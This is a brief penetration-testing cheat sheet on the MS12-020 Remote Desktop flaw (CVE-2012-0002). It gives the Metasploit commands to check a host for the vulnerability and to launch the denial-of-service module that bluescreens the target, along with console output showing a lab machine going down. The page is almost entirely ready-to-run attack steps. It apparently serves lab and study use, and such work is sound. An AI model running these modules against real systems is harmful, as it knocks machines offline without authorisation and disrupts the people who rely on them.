CVE

CVE-2012-0002 | MS12-020

  • MS12-020
  • CVE-2012-0002
  • CVE-2012-0152

Scanner

msf5 > use auxiliary/scanner/rdp/ms12_020_check

Examples

msf5 > use auxiliary/scanner/rdp/ms12_020_check
msf5 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 10.10.10.16
msf5 auxiliary(scanner/rdp/ms12_020_check) > run

[+] 10.10.10.16:3389      - 10.10.10.16:3389 - The target is vulnerable.
[*] 10.10.10.16:3389      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploit DoS

Will bluescreen the target.

msf5 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 10.10.10.15
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run
[*] Running module against 10.10.10.15

[*] 10.10.10.15:3389 - 10.10.10.15:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 10.10.10.15:3389 - 10.10.10.15:3389 - 210 bytes sent
[*] 10.10.10.15:3389 - 10.10.10.15:3389 - Checking RDP status...
[+] 10.10.10.15:3389 - 10.10.10.15:3389 seems down
[*] Auxiliary module execution completed

URL List